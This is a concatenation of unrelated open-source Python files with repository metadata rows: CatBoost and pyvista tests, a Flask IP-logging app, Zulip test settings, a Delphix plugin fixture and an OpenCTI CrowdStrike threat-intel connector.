cpu_so_name = PythonTrait('', '', []).so_name()
cpu_so_path = yatest.common.binary_path(os.path.join(PYTHON_PACKAGE_DIR, "catboost", "no_cuda", cpu_so_name))
wheel_name = 'catboost.whl'
make_wheel(wheel_name, 'catboost', '0.0.0', yatest.common.source_path('.'), cpu_so_path, '')
with zipfile.ZipFile(wheel_name, 'r') as f:
f.extractall('catboost')
python_binary = yatest.common.binary_path(os.path.join(PYTHON_PACKAGE_DIR, "ut", "medium", "python_binary", "catboost-python"))
test_script = yatest.common.source_path(os.path.join(PYTHON_PACKAGE_DIR, "ut", "medium", "run_catboost.py"))
yatest.common.execute(
[python_binary, test_script],
env={'PYTHONPATH': os.path.join(os.getcwd(), 'catboost')},
cwd=yatest.common.test_output_path()
)
| 38.241379 | 131 | 0.706041 |
528405100008497b018b1d02621a1181b42c55a5 | 2,772 | py | Python | src/ip.py | thoolihan/LogIPsToAWSDynamoDB | 528734d4aca0fc27a5a702a95898b7de6fbb48bc | [
"Apache-2.0"
] | 1 | 2016-11-12T15:12:30.000Z | 2016-11-12T15:12:30.000Z | src/ip.py | thoolihan/LogIPsToAWSDynamoDB | 528734d4aca0fc27a5a702a95898b7de6fbb48bc | [
"Apache-2.0"
] | null | null | null | src/ip.py | thoolihan/LogIPsToAWSDynamoDB | 528734d4aca0fc27a5a702a95898b7de6fbb48bc | [
"Apache-2.0"
] | null | null | null | from flask import Flask
from flask import jsonify
from flask import request, Response
from functools import wraps
from datetime import datetime
import os
import boto3
import json
import argparse
from boto3.dynamodb.conditions import Key, Attr
app = Flask(__name__)
cred_file = open('credentials.json').read()
creds = json.loads(cred_file)
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--local', help="set to anything to use local dynamodb")
args = parser.parse_args()
tbl_name="ip_log"
def root_dir(): # pragma: no cover
return os.path.abspath(os.path.dirname(__file__))
def get_file(filename): # pragma: no cover
try:
src = os.path.join(root_dir(), 'templates', filename)
return open(src).read()
except IOError as exc:
return str(exc)
def check_auth(user, password):
return user==creds['user'] and password==creds['password']
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
def get_ip_log():
if args.local:
dyn = boto3.resource('dynamodb',
endpoint_url='http://localhost:8000')
else:
dyn = boto3.resource('dynamodb')
return dyn.Table(tbl_name)
def log_to_aws(ip, location):
dt = datetime.now()
ip_log_table = get_ip_log()
data = {"ip": ip,
"location": location,
"date": str(dt)}
ip_log_table.put_item(Item = data)
@app.route('/log', methods=['GET'])
def metrics(): # pragma: no cover
content = get_file('log.html')
return Response(content, mimetype="text/html")
@app.route("/", methods=['GET'])
@requires_auth
def ip():
return jsonify({'ip': request.remote_addr}), 200
@app.route("/log_ip", methods=['GET','POST'])
@requires_auth
def log_ip():
ip = request.remote_addr
location = request.values.get('location')
log_to_aws(ip, location)
return jsonify({'result': 'success',
'location': location,
'ip': ip}), 200
@app.route("/list", methods=['GET'])
@requires_auth
def home():
location = request.values.get('location')
ipl = get_ip_log()
res = ipl.query(KeyConditionExpression=Key('location').eq(location),
ScanIndexForward=False, Limit=10)['Items']
return jsonify(res), 200
if __name__ == "__main__":
app.run()
| 28.875 | 82 | 0.651876 |
5c25f9e962723718a17029599a22f23c42cea82d | 5,449 | py | Python | zproject/test_settings.py | acguglielmo/zulip | 97ed71ca699c3abd1c2584cc3c6a8370430ae2f6 | [
"Apache-2.0"
] | null | null | null | zproject/test_settings.py | acguglielmo/zulip | 97ed71ca699c3abd1c2584cc3c6a8370430ae2f6 | [
"Apache-2.0"
] | null | null | null | zproject/test_settings.py | acguglielmo/zulip | 97ed71ca699c3abd1c2584cc3c6a8370430ae2f6 | [
"Apache-2.0"
] | null | null | null | import os
# test_settings.py works differently from
# dev_settings.py/prod_settings.py; it actually is directly referenced
# by the test suite as DJANGO_SETTINGS_MODULE and imports settings.py
# directly and then hacks up the values that are different for the
# test suite. As will be explained, this is kinda messy and probably
# we'd be better off switching it to work more like dev_settings.py,
# but for now, this is what we have.
#
# An important downside of the test_settings.py approach is that if we
# want to change any settings that settings.py then computes
# additional settings from (e.g. EXTERNAL_HOST), we need to do a hack
# like the below line(s) before we import from settings, for
# transmitting the value of EXTERNAL_HOST to dev_settings.py so that
# it can be set there, at the right place in the settings.py flow.
# Ick.
if os.getenv("EXTERNAL_HOST") is None:
os.environ["EXTERNAL_HOST"] = "testserver"
from .settings import *
# Clear out the REALM_HOSTS set in dev_settings.py
REALM_HOSTS = {}
# Used to clone DBs in backend tests.
BACKEND_DATABASE_TEMPLATE = 'zulip_test_template'
DATABASES["default"] = {
"NAME": os.getenv("ZULIP_DB_NAME", "zulip_test"),
"USER": "zulip_test",
"PASSWORD": LOCAL_DATABASE_PASSWORD,
"HOST": "localhost",
"SCHEMA": "zulip",
"ENGINE": "django.db.backends.postgresql_psycopg2",
"TEST_NAME": "django_zulip_tests",
"OPTIONS": {"connection_factory": TimeTrackingConnection},
}
if "TORNADO_SERVER" in os.environ:
# This covers the Casper test suite case
TORNADO_SERVER = os.environ["TORNADO_SERVER"]
else:
# This covers the backend test suite case
TORNADO_SERVER = None
CAMO_URI = 'https://external-content.zulipcdn.net/'
CAMO_KEY = 'dummy'
if "CASPER_TESTS" in os.environ:
CASPER_TESTS = True
# Disable search pills prototype for production use
SEARCH_PILLS_ENABLED = False
# Decrease the get_updates timeout to 1 second.
# This allows CasperJS to proceed quickly to the next test step.
POLL_TIMEOUT = 1000
# Don't use the real message log for tests
EVENT_LOG_DIR = '/tmp/zulip-test-event-log'
# Stores the messages in `django.core.mail.outbox` rather than sending them.
EMAIL_BACKEND = 'django.core.mail.backends.locmem.EmailBackend'
# The test suite uses EmailAuthBackend
AUTHENTICATION_BACKENDS += ('zproject.backends.EmailAuthBackend',)
# Configure Google Oauth2
GOOGLE_OAUTH2_CLIENT_ID = "test_client_id"
# Makes testing LDAP backend require less mocking
AUTH_LDAP_ALWAYS_UPDATE_USER = False
TEST_SUITE = True
RATE_LIMITING = False
# Don't use rabbitmq from the test suite -- the user_profile_ids for
# any generated queue elements won't match those being used by the
# real app.
USING_RABBITMQ = False
# Disable the tutorial because it confuses the client tests.
TUTORIAL_ENABLED = False
# Disable use of memcached for caching
CACHES['database'] = {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
'LOCATION': 'zulip-database-test-cache',
'TIMEOUT': 3600,
'CONN_MAX_AGE': 600,
'OPTIONS': {
'MAX_ENTRIES': 100000
}
}
# Disable caching on sessions to make query counts consistent
SESSION_ENGINE = "django.contrib.sessions.backends.db"
# Use production config from Webpack in tests
if CASPER_TESTS:
WEBPACK_FILE = 'webpack-stats-production.json'
else:
WEBPACK_FILE = os.path.join('var', 'webpack-stats-test.json')
WEBPACK_LOADER['DEFAULT']['STATS_FILE'] = os.path.join(DEPLOY_ROOT, WEBPACK_FILE)
# Don't auto-restart Tornado server during automated tests
AUTORELOAD = False
if not CASPER_TESTS:
# Use local memory cache for backend tests.
CACHES['default'] = {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'
}
def set_loglevel(logger_name, level) -> None:
LOGGING['loggers'].setdefault(logger_name, {})['level'] = level
set_loglevel('zulip.requests', 'CRITICAL')
set_loglevel('zulip.management', 'CRITICAL')
set_loglevel('django.request', 'ERROR')
set_loglevel('fakeldap', 'ERROR')
set_loglevel('zulip.send_email', 'ERROR')
set_loglevel('zerver.lib.digest', 'ERROR')
set_loglevel('zerver.lib.email_mirror', 'ERROR')
set_loglevel('zerver.worker.queue_processors', 'WARNING')
# Enable file:/// hyperlink support by default in tests
ENABLE_FILE_LINKS = True
LOCAL_UPLOADS_DIR = 'var/test_uploads'
S3_KEY = 'test-key'
S3_SECRET_KEY = 'test-secret-key'
S3_AUTH_UPLOADS_BUCKET = 'test-authed-bucket'
S3_AVATAR_BUCKET = 'test-avatar-bucket'
# Test Custom TOS template rendering
TERMS_OF_SERVICE = 'corporate/terms.md'
INLINE_URL_EMBED_PREVIEW = False
HOME_NOT_LOGGED_IN = '/login'
LOGIN_URL = '/accounts/login'
# By default will not send emails when login occurs.
# Explicity set this to True within tests that must have this on.
SEND_LOGIN_EMAILS = False
GOOGLE_OAUTH2_CLIENT_ID = "id"
GOOGLE_OAUTH2_CLIENT_SECRET = "secret"
SOCIAL_AUTH_GITHUB_KEY = "key"
SOCIAL_AUTH_GITHUB_SECRET = "secret"
SOCIAL_AUTH_SUBDOMAIN = 'www'
# By default two factor authentication is disabled in tests.
# Explicitly set this to True within tests that must have this on.
TWO_FACTOR_AUTHENTICATION_ENABLED = False
PUSH_NOTIFICATION_BOUNCER_URL = None
# Disable messages from slow queries as they affect backend tests.
SLOW_QUERY_LOGS_STREAM = None
THUMBOR_URL = 'http://127.0.0.1:9995'
# Logging the emails while running the tests adds them
# to /emails page.
DEVELOPMENT_LOG_EMAILS = False
| 33.024242 | 81 | 0.750413 |
094c1dde0edea66ebc71734d2f9f45549868ce35 | 2,201 | py | Python | tools/src/test/python/dlpx/virtualization/_internal/fake_plugin/staged/multiple_warnings.py | vr-delphix/virtualization-sdk | ebf934c9eb1337b35f7eb34e807af63ea259da6a | [
"Apache-2.0"
] | null | null | null | tools/src/test/python/dlpx/virtualization/_internal/fake_plugin/staged/multiple_warnings.py | vr-delphix/virtualization-sdk | ebf934c9eb1337b35f7eb34e807af63ea259da6a | [
"Apache-2.0"
] | 95 | 2020-03-06T00:25:42.000Z | 2020-06-09T00:22:25.000Z | tools/src/test/python/dlpx/virtualization/_internal/fake_plugin/staged/multiple_warnings.py | vr-delphix/virtualization-sdk | ebf934c9eb1337b35f7eb34e807af63ea259da6a | [
"Apache-2.0"
] | 3 | 2019-10-14T18:33:30.000Z | 2019-10-23T17:08:08.000Z | #
# Copyright (c) 2019 by Delphix. All rights reserved.
#
# flake8: noqa
from __future__ import print_function
import logging
from dlpx.virtualization.platform import Plugin
logger = logging.getLogger()
logger.setLevel(logging.NOTSET)
staged = Plugin()
# Renamed source_connection to connection to test if named arg check detects.
@staged.discovery.repository()
def repository_discovery(connection):
return []
@staged.discovery.source_config()
def source_config_discovery(source_connection, repository):
return []
@staged.linked.mount_specification()
def staged_mount_specification(staged_source, repository):
return None
@staged.linked.pre_snapshot()
def staged_pre_snapshot(repository, source_config, staged_source,
snapshot_parameters):
pass
@staged.linked.post_snapshot()
def staged_post_snapshot(repository, source_config, staged_source,
snapshot_parameters):
return None
@staged.linked.start_staging()
def start_staging(repository, source_config, staged_source):
pass
@staged.linked.stop_staging()
def stop_staging(repository, source_config, staged_source):
pass
@staged.linked.status()
def staged_status(staged_source, repository, source_config):
return None
@staged.linked.worker()
def staged_worker(repository, source_config, staged_source):
pass
@staged.virtual.configure()
def configure(virtual_source, repository, snapshot):
return None
@staged.virtual.reconfigure()
def reconfigure(virtual_source, repository, source_config, snapshot):
return None
# Removed virtual.mount_specification for test validation.
@staged.virtual.pre_snapshot()
def pre_snapshot(repository, source_config, virtual_source):
pass
@staged.virtual.post_snapshot()
def post_snapshot(repository, source_config, virtual_source):
return None
@staged.virtual.start()
def start(repository, source_config, virtual_source):
pass
# Added snapshot parameter to check if arg check fails.
@staged.virtual.stop()
def stop(repository, source_config, virtual_source, snapshot):
pass
@staged.upgrade.repository('2019.10.30')
def repo_upgrade(old_repository):
return old_repository
| 21.578431 | 77 | 0.769196 |
c240f22df109a27a78549581e86086e54cb7a57b | 12,003 | py | Python | crowdstrike/src/crowdstrike/core.py | RomainGUIGNARD/connectors | 526c5c21267ec4c5c97436d76a7a23156c0f5281 | [
"Apache-2.0"
] | 1 | 2020-10-08T18:39:06.000Z | 2020-10-08T18:39:06.000Z | crowdstrike/src/crowdstrike/core.py | RomainGUIGNARD/connectors | 526c5c21267ec4c5c97436d76a7a23156c0f5281 | [
"Apache-2.0"
] | null | null | null | crowdstrike/src/crowdstrike/core.py | RomainGUIGNARD/connectors | 526c5c21267ec4c5c97436d76a7a23156c0f5281 | [
"Apache-2.0"
] | 1 | 2020-05-03T12:41:47.000Z | 2020-05-03T12:41:47.000Z | # -*- coding: utf-8 -*-
"""OpenCTI CrowdStrike connector core module."""
import os
import time
from typing import Any, Dict, List, Mapping, Optional
import yaml
from crowdstrike_client.client import CrowdStrikeClient
from pycti import OpenCTIConnectorHelper
from pycti.connector.opencti_connector_helper import get_config_variable
from stix2 import Identity, MarkingDefinition, TLP_AMBER, TLP_GREEN, TLP_RED, TLP_WHITE
from crowdstrike.actors import ActorImporter
from crowdstrike.indicators import IndicatorImporter
from crowdstrike.reports import ReportImporter
from crowdstrike.rules_yara_master import RulesYaraMasterImporter
from crowdstrike.utils import convert_comma_separated_str_to_list, create_organization
class CrowdStrike:
"""CrowdStrike connector."""
_CONFIG_NAMESPACE = "crowdstrike"
_CONFIG_BASE_URL = f"{_CONFIG_NAMESPACE}.base_url"
_CONFIG_CLIENT_ID = f"{_CONFIG_NAMESPACE}.client_id"
_CONFIG_CLIENT_SECRET = f"{_CONFIG_NAMESPACE}.client_secret"
_CONFIG_INTERVAL_SEC = f"{_CONFIG_NAMESPACE}.interval_sec"
_CONFIG_SCOPES = f"{_CONFIG_NAMESPACE}.scopes"
_CONFIG_TLP = f"{_CONFIG_NAMESPACE}.tlp"
_CONFIG_ACTOR_START_TIMESTAMP = f"{_CONFIG_NAMESPACE}.actor_start_timestamp"
_CONFIG_REPORT_START_TIMESTAMP = f"{_CONFIG_NAMESPACE}.report_start_timestamp"
_CONFIG_REPORT_INCLUDE_TYPES = f"{_CONFIG_NAMESPACE}.report_include_types"
_CONFIG_REPORT_STATUS = f"{_CONFIG_NAMESPACE}.report_status"
_CONFIG_REPORT_TYPE = f"{_CONFIG_NAMESPACE}.report_type"
_CONFIG_REPORT_GUESS_MALWARE = f"{_CONFIG_NAMESPACE}.report_guess_malware"
_CONFIG_INDICATOR_START_TIMESTAMP = f"{_CONFIG_NAMESPACE}.indicator_start_timestamp"
_CONFIG_INDICATOR_EXCLUDE_TYPES = f"{_CONFIG_NAMESPACE}.indicator_exclude_types"
_CONFIG_UPDATE_EXISTING_DATA = "connector.update_existing_data"
_CONFIG_SCOPE_ACTOR = "actor"
_CONFIG_SCOPE_REPORT = "report"
_CONFIG_SCOPE_INDICATOR = "indicator"
_CONFIG_SCOPE_YARA_MASTER = "yara_master"
_CONFIG_TLP_MAPPING = {
"white": TLP_WHITE,
"green": TLP_GREEN,
"amber": TLP_AMBER,
"red": TLP_RED,
}
_CONFIG_REPORT_STATUS_MAPPING = {
"new": 0,
"in progress": 1,
"analyzed": 2,
"closed": 3,
}
_DEFAULT_REPORT_TYPE = "Threat Report"
_STATE_LAST_RUN = "last_run"
def __init__(self) -> None:
"""Initialize CrowdStrike connector."""
config = self._read_configuration()
self.helper = OpenCTIConnectorHelper(config)
# CrowdStrike connector configuration
base_url = self._get_configuration(config, self._CONFIG_BASE_URL)
client_id = self._get_configuration(config, self._CONFIG_CLIENT_ID)
client_secret = self._get_configuration(config, self._CONFIG_CLIENT_SECRET)
self.interval_sec = self._get_configuration(
config, self._CONFIG_INTERVAL_SEC, is_number=True
)
scopes_str = self._get_configuration(config, self._CONFIG_SCOPES)
scopes = set()
if scopes_str is not None:
scopes = set(convert_comma_separated_str_to_list(scopes_str))
self.scopes = scopes
tlp = self._get_configuration(config, self._CONFIG_TLP)
tlp_marking = self._convert_tlp_to_marking_definition(tlp)
actor_start_timestamp = self._get_configuration(
config, self._CONFIG_ACTOR_START_TIMESTAMP, is_number=True
)
report_start_timestamp = self._get_configuration(
config, self._CONFIG_REPORT_START_TIMESTAMP, is_number=True
)
report_status_str = self._get_configuration(config, self._CONFIG_REPORT_STATUS)
report_status = self._convert_report_status_str_to_report_status_int(
report_status_str
)
report_type = self._get_configuration(config, self._CONFIG_REPORT_TYPE)
if not report_type:
report_type = self._DEFAULT_REPORT_TYPE
report_include_types_str = self._get_configuration(
config, self._CONFIG_REPORT_INCLUDE_TYPES
)
report_include_types = []
if report_include_types_str is not None:
report_include_types = convert_comma_separated_str_to_list(
report_include_types_str
)
report_guess_malware = bool(
self._get_configuration(config, self._CONFIG_REPORT_GUESS_MALWARE)
)
indicator_start_timestamp = self._get_configuration(
config, self._CONFIG_INDICATOR_START_TIMESTAMP, is_number=True
)
indicator_exclude_types_str = self._get_configuration(
config, self._CONFIG_INDICATOR_EXCLUDE_TYPES
)
indicator_exclude_types = []
if indicator_exclude_types_str is not None:
indicator_exclude_types = convert_comma_separated_str_to_list(
indicator_exclude_types_str
)
update_existing_data = bool(
self._get_configuration(config, self._CONFIG_UPDATE_EXISTING_DATA)
)
author = self._create_author()
# Create CrowdStrike client and importers
client = CrowdStrikeClient(base_url, client_id, client_secret)
self.actor_importer = ActorImporter(
self.helper,
client.intel_api.actors,
update_existing_data,
author,
actor_start_timestamp,
tlp_marking,
)
self.report_importer = ReportImporter(
self.helper,
client.intel_api.reports,
update_existing_data,
author,
report_start_timestamp,
tlp_marking,
report_include_types,
report_status,
report_type,
report_guess_malware,
)
self.indicator_importer = IndicatorImporter(
self.helper,
client.intel_api.indicators,
client.intel_api.reports,
update_existing_data,
author,
indicator_start_timestamp,
tlp_marking,
indicator_exclude_types,
report_status,
report_type,
)
self.rules_yara_master_importer = RulesYaraMasterImporter(
self.helper,
client.intel_api.rules,
client.intel_api.reports,
author,
tlp_marking,
update_existing_data,
report_status,
report_type,
)
@staticmethod
def _read_configuration() -> Dict[str, str]:
config_file_path = os.path.dirname(os.path.abspath(__file__)) + "/../config.yml"
if not os.path.isfile(config_file_path):
return {}
return yaml.load(open(config_file_path), Loader=yaml.FullLoader)
@staticmethod
def _create_author() -> Identity:
return create_organization("CrowdStrike")
@staticmethod
def _get_yaml_path(config_name: str) -> List[str]:
return config_name.split(".")
@staticmethod
def _get_environment_variable_name(yaml_path: List[str]) -> str:
return "_".join(yaml_path).upper()
@classmethod
def _get_configuration(
cls, config: Dict[str, Any], config_name: str, is_number: bool = False
) -> Any:
yaml_path = cls._get_yaml_path(config_name)
env_var_name = cls._get_environment_variable_name(yaml_path)
config_value = get_config_variable(
env_var_name, yaml_path, config, isNumber=is_number
)
return config_value
@classmethod
def _convert_tlp_to_marking_definition(cls, tlp_value: str) -> MarkingDefinition:
return cls._CONFIG_TLP_MAPPING[tlp_value.lower()]
@classmethod
def _convert_report_status_str_to_report_status_int(cls, report_status: str) -> int:
return cls._CONFIG_REPORT_STATUS_MAPPING[report_status.lower()]
def get_interval(self) -> int:
return int(self.interval_sec)
def _load_state(self) -> Dict[str, Any]:
current_state = self.helper.get_state()
if not current_state:
return {}
return current_state
@staticmethod
def _get_state_value(
state: Optional[Mapping[str, Any]], key: str, default: Optional[Any] = None
) -> Any:
if state is not None:
return state.get(key, default)
return default
def _is_scheduled(self, last_run: Optional[int], current_time: int) -> bool:
if last_run is None:
return True
time_diff = current_time - last_run
return time_diff >= self.get_interval()
@staticmethod
def _current_unix_timestamp() -> int:
return int(time.time())
def run(self):
self.helper.log_info("Starting CrowdStrike connector...")
while True:
try:
timestamp = self._current_unix_timestamp()
current_state = self._load_state()
self.helper.log_info(f"Loaded state: {current_state}")
last_run = self._get_state_value(current_state, self._STATE_LAST_RUN)
if self._is_scheduled(last_run, timestamp):
actor_importer_state = self._run_actor_importer(current_state)
report_importer_state = self._run_report_importer(current_state)
indicator_importer_state = self._run_indicator_importer(
current_state
)
yara_master_importer_state = self._run_rules_yara_master_importer(
current_state
)
new_state = current_state.copy()
new_state.update(actor_importer_state)
new_state.update(report_importer_state)
new_state.update(indicator_importer_state)
new_state.update(yara_master_importer_state)
new_state[self._STATE_LAST_RUN] = self._current_unix_timestamp()
self.helper.log_info(f"Storing new state: {new_state}")
self.helper.set_state(new_state)
self.helper.log_info(
f"State stored, next run in: {self.get_interval()} seconds"
)
else:
new_interval = self.get_interval() - (timestamp - last_run)
self.helper.log_info(
f"Connector will not run, next run in: {new_interval} seconds"
)
time.sleep(60)
except (KeyboardInterrupt, SystemExit):
self.helper.log_info("Connector stop")
exit(0)
except Exception as e:
self.helper.log_error(str(e))
time.sleep(60)
def _run_actor_importer(
self, current_state: Mapping[str, Any]
) -> Mapping[str, Any]:
if self._is_scope_enabled(self._CONFIG_SCOPE_ACTOR):
return self.actor_importer.run(current_state)
return {}
def _run_report_importer(
self, current_state: Mapping[str, Any]
) -> Mapping[str, Any]:
if self._is_scope_enabled(self._CONFIG_SCOPE_REPORT):
return self.report_importer.run(current_state)
return {}
def _run_indicator_importer(
self, current_state: Mapping[str, Any]
) -> Mapping[str, Any]:
if self._is_scope_enabled(self._CONFIG_SCOPE_INDICATOR):
return self.indicator_importer.run(current_state)
return {}
def _run_rules_yara_master_importer(
self, current_state: Mapping[str, Any]
) -> Mapping[str, Any]:
if self._is_scope_enabled(self._CONFIG_SCOPE_YARA_MASTER):
return self.rules_yara_master_importer.run(current_state)
return {}
def _is_scope_enabled(self, scope: str) -> bool:
result = scope in self.scopes
if not result:
self.helper.log_info(f"Scope '{scope}' is not enabled")
return result
| 35.617211 | 88 | 0.653087 |
e25d3dce75a0dec79df3cccade8b4c1fd5b69560 | 20,648 | py | Python | tests/test_grid.py | borsden/pyvista | dface2fbec53f9a3679bad9454d95358cb2695a4 | [
"MIT"
] | null | null | null | tests/test_grid.py | borsden/pyvista | dface2fbec53f9a3679bad9454d95358cb2695a4 | [
"MIT"
] | null | null | null | tests/test_grid.py | borsden/pyvista | dface2fbec53f9a3679bad9454d95358cb2695a4 | [
"MIT"
] | null | null | null | import pathlib
import os
import weakref
import numpy as np
import pytest
import vtk
import pyvista
from pyvista import examples
from pyvista.plotting import system_supports_plotting
test_path = os.path.dirname(os.path.abspath(__file__))
VTK9 = vtk.vtkVersion().GetVTKMajorVersion() >= 9
# must be manually set until pytest adds parametrize with fixture feature
HEXBEAM_CELLS_BOOL = np.ones(40, np.bool_) # matches hexbeam.n_cells == 40
STRUCTGRID_CELLS_BOOL = np.ones(729, np.bool_) # struct_grid.n_cells == 729
def test_volume(hexbeam):
assert hexbeam.volume > 0.0
@pytest.mark.skipif(not system_supports_plotting(), reason="Requires system to support plotting")
def test_struct_example():
# create and plot structured grid
grid = examples.load_structured()
cpos = grid.plot(off_screen=True) # basic plot
assert isinstance(cpos, pyvista.CameraPosition)
# Plot mean curvature
cpos_curv = grid.plot_curvature(off_screen=True)
assert isinstance(cpos_curv, pyvista.CameraPosition)
def test_init_from_structured(struct_grid):
unstruct_grid = pyvista.UnstructuredGrid(struct_grid)
assert unstruct_grid.points.shape[0] == struct_grid.x.size
assert np.all(unstruct_grid.celltypes == 12)
def test_init_from_unstructured(hexbeam):
grid = pyvista.UnstructuredGrid(hexbeam, deep=True)
grid.points += 1
assert not np.any(grid.points == hexbeam.points)
def test_init_bad_input():
with pytest.raises(TypeError):
unstruct_grid = pyvista.UnstructuredGrid(np.array(1))
with pytest.raises(TypeError):
unstruct_grid = pyvista.UnstructuredGrid(np.array(1),
np.array(1),
np.array(1),
'woa')
def test_init_from_arrays():
cells = np.array([8, 0, 1, 2, 3, 4, 5, 6, 7, 8, 8, 9, 10, 11, 12, 13, 14, 15])
cell_type = np.array([vtk.VTK_HEXAHEDRON, vtk.VTK_HEXAHEDRON], np.int32)
cell1 = np.array([[0, 0, 0],
[1, 0, 0],
[1, 1, 0],
[0, 1, 0],
[0, 0, 1],
[1, 0, 1],
[1, 1, 1],
[0, 1, 1]])
cell2 = np.array([[0, 0, 2],
[1, 0, 2],
[1, 1, 2],
[0, 1, 2],
[0, 0, 3],
[1, 0, 3],
[1, 1, 3],
[0, 1, 3]])
points = np.vstack((cell1, cell2)).astype(np.int32)
if VTK9:
grid = pyvista.UnstructuredGrid(cells, cell_type, points, deep=False)
assert np.allclose(grid.cells, cells)
else:
offset = np.array([0, 9], np.int8)
grid = pyvista.UnstructuredGrid(offset, cells, cell_type, points, deep=False)
assert np.allclose(grid.offset, offset)
assert grid.n_cells == 2
assert np.allclose(cells, grid.cells)
if VTK9:
assert np.allclose(grid.cell_connectivity, np.arange(16))
else:
with pytest.raises(AttributeError):
grid.cell_connectivity
def test_destructor():
ugrid = examples.load_hexbeam()
ref = weakref.ref(ugrid)
del ugrid
assert ref() is None
def test_surface_indices(hexbeam):
surf = hexbeam.extract_surface()
surf_ind = surf.point_arrays['vtkOriginalPointIds']
assert np.allclose(surf_ind, hexbeam.surface_indices())
def test_extract_feature_edges(hexbeam):
edges = hexbeam.extract_feature_edges(90)
assert edges.n_points
edges = hexbeam.extract_feature_edges(180)
assert not edges.n_points
def test_triangulate_inplace(hexbeam):
hexbeam.triangulate(inplace=True)
assert (hexbeam.celltypes == vtk.VTK_TETRA).all()
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', pyvista.pointset.UnstructuredGrid._WRITERS)
def test_save(extension, binary, tmpdir, hexbeam):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
hexbeam.save(filename, binary)
grid = pyvista.UnstructuredGrid(filename)
assert grid.cells.shape == hexbeam.cells.shape
assert grid.points.shape == hexbeam.points.shape
grid = pyvista.read(filename)
assert grid.cells.shape == hexbeam.cells.shape
assert grid.points.shape == hexbeam.points.shape
assert isinstance(grid, pyvista.UnstructuredGrid)
def test_pathlib_read_write(tmpdir, hexbeam):
path = pathlib.Path(str(tmpdir.mkdir("tmpdir").join('tmp.vtk')))
assert not path.is_file()
hexbeam.save(path)
assert path.is_file()
grid = pyvista.UnstructuredGrid(path)
assert grid.cells.shape == hexbeam.cells.shape
assert grid.points.shape == hexbeam.points.shape
grid = pyvista.read(path)
assert grid.cells.shape == hexbeam.cells.shape
assert grid.points.shape == hexbeam.points.shape
assert isinstance(grid, pyvista.UnstructuredGrid)
def test_init_bad_filename():
filename = os.path.join(test_path, 'test_grid.py')
with pytest.raises(ValueError):
grid = pyvista.UnstructuredGrid(filename)
with pytest.raises(FileNotFoundError):
grid = pyvista.UnstructuredGrid('not a file')
def test_save_bad_extension():
with pytest.raises(FileNotFoundError):
grid = pyvista.UnstructuredGrid('file.abc')
def test_linear_copy(hexbeam):
# need a grid with quadratic cells
lgrid = hexbeam.linear_copy()
assert np.all(lgrid.celltypes < 20)
def test_linear_copy_surf_elem():
cells = np.array([8, 0, 1, 2, 3, 4, 5, 6, 7, 6, 8, 9, 10, 11, 12, 13], np.int32)
celltypes = np.array([vtk.VTK_QUADRATIC_QUAD, vtk.VTK_QUADRATIC_TRIANGLE],
np.uint8)
cell0 = [[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0],
[1.0, 1.0, 0.0],
[0.0, 1.0, 0.0],
[0.5, 0.1, 0.0],
[1.1, 0.5, 0.0],
[0.5, 0.9, 0.0],
[0.1, 0.5, 0.0]]
cell1 = [[0.0, 0.0, 1.0],
[1.0, 0.0, 1.0],
[0.5, 0.5, 1.0],
[0.5, 0.0, 1.3],
[0.7, 0.7, 1.3],
[0.1, 0.1, 1.3]]
points = np.vstack((cell0, cell1))
if VTK9:
grid = pyvista.UnstructuredGrid(cells, celltypes, points, deep=False)
else:
offset = np.array([0, 9])
grid = pyvista.UnstructuredGrid(offset, cells, celltypes, points, deep=False)
lgrid = grid.linear_copy()
qfilter = vtk.vtkMeshQuality()
qfilter.SetInputData(lgrid)
qfilter.Update()
qual = pyvista.wrap(qfilter.GetOutput())['Quality']
assert np.allclose(qual, [1, 1.4], atol=0.01)
def test_extract_cells(hexbeam):
ind = [1, 2, 3]
part_beam = hexbeam.extract_cells(ind)
assert part_beam.n_cells == len(ind)
assert part_beam.n_points < hexbeam.n_points
assert np.allclose(part_beam.cell_arrays['vtkOriginalCellIds'], ind)
mask = np.zeros(hexbeam.n_cells, np.bool_)
mask[ind] = True
part_beam = hexbeam.extract_cells(mask)
assert part_beam.n_cells == len(ind)
assert part_beam.n_points < hexbeam.n_points
assert np.allclose(part_beam.cell_arrays['vtkOriginalCellIds'], ind)
ind = np.vstack(([1, 2], [4, 5]))[:, 0]
part_beam = hexbeam.extract_cells(ind)
def test_merge(hexbeam):
grid = hexbeam.copy()
grid.points[:, 0] += 1
unmerged = grid.merge(hexbeam, inplace=False, merge_points=False)
grid.merge(hexbeam, inplace=True, merge_points=True)
assert grid.n_points > hexbeam.n_points
assert grid.n_points < unmerged.n_points
def test_merge_not_main(hexbeam):
grid = hexbeam.copy()
grid.points[:, 0] += 1
unmerged = grid.merge(hexbeam, inplace=False, merge_points=False,
main_has_priority=False)
grid.merge(hexbeam, inplace=True, merge_points=True)
assert grid.n_points > hexbeam.n_points
assert grid.n_points < unmerged.n_points
def test_merge_list(hexbeam):
grid_a = hexbeam.copy()
grid_a.points[:, 0] += 1
grid_b = hexbeam.copy()
grid_b.points[:, 1] += 1
grid_a.merge([hexbeam, grid_b], inplace=True, merge_points=True)
assert grid_a.n_points > hexbeam.n_points
def test_merge_invalid(hexbeam, sphere):
with pytest.raises(TypeError):
sphere.merge([hexbeam], inplace=True)
def test_init_structured(struct_grid):
xrng = np.arange(-10, 10, 2)
yrng = np.arange(-10, 10, 2)
zrng = np.arange(-10, 10, 2)
x, y, z = np.meshgrid(xrng, yrng, zrng)
grid = pyvista.StructuredGrid(x, y, z)
assert np.allclose(struct_grid.x, x)
assert np.allclose(struct_grid.y, y)
assert np.allclose(struct_grid.z, z)
grid_a = pyvista.StructuredGrid(grid)
assert np.allclose(grid_a.points, grid.points)
def test_invalid_init_structured():
xrng = np.arange(-10, 10, 2)
yrng = np.arange(-10, 10, 2)
zrng = np.arange(-10, 10, 2)
x, y, z = np.meshgrid(xrng, yrng, zrng)
